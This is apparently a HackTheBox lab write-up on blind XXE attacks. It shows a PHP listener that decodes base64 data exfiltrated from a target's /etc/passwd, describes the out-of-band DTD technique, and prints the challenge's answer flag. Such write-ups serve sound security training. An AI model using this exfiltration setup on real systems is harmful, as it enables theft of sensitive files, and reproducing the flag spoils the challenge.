Summary

This article discusses a method for performing blind XXE (XML External Entity) attacks to exfiltrate data from a target machine without relying on error messages or output from XML entities.

Abstract

The article builds upon a previous post that covered error-based XXE attacks. It details an approach for out-of-band data exfiltration where the attacker does not receive direct feedback from the target system. The method involves creating a malicious XML entity that requests sensitive files, such as /etc/passwd, and encodes them in base64. This entity is saved in a blind-xxe.dtd file and hosted on an attacking machine. The attacker then sets up a PHP server with a script to decode the incoming base64-encoded data. Using Burp Suite, the attacker injects a payload that points to the malicious DTD file. If successful, the target system's sensitive data is logged on the attacker's server. The article demonstrates how to obtain the flag from a specific section of the target machine by modifying the request file and using the same payload, ultimately revealing the flag HTB{1_d0n7_n33d_0u7pu7_70_3xf1l7r473_d474}.

Opinions

The author emphasizes the effectiveness of out-of-band attacks for exfiltrating data without needing error messages or direct output from the target system.
The technique is presented as a viable method for obtaining sensitive information from a target machine, such as user credentials and flags in penetration testing scenarios.
The use of base64 encoding for data exfiltration is highlighted as a means to bypass certain security controls and filters.
The article suggests that attackers can automate the decoding process with a simple PHP script, streamlining the data retrieval process.
The author implies that security professionals should be aware of such attack vectors and implement appropriate measures to mitigate them, such as disabling external entity processing and monitoring outbound traffic.

HackTheBox — Web Attacks: XXE with Blind Exfiltration Data

In my previou blog post, HackTheBox — Web Attacks: Error Based XXE to exfiltrate data, I went over the scenario in which we take advantage of web applications’ displaying error messages to exfiltrate data from the target machine. In this blog post, I will go over how we obtain information even when we neither get the output of any of the XML entities nor do we get any PHP errors displayed.

Out-Of-Band data exfiltration

The techniques used in this scenario will be using Out-of-band attacks, which makes the target communicate with our attacking machine.

First, we create an entity and save it in blind-xxe.dtd file that requests the resources we desire to obtain and host it on our attacking machine:

The entity file will request a file /etc/passwd and based-64 encode the file.

Then I write a small script, index.php,to automatically decode the strings once we get them.

<?php
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>

Run the PHP server on the attacking machine

php -S 0.0.0.0:8000

In Burp Suite, inject the payload like the below image

If the attack is successful, we should get the content of /etc/passwd from the target machine.

Using similar technique, we can obtain the flag from the section by modifying the request file

We keep the same payload and resend the request. We should get the flag from the specified file

HTB{1_d0n7_n33d_0u7pu7_70_3xf1l7r473_d474}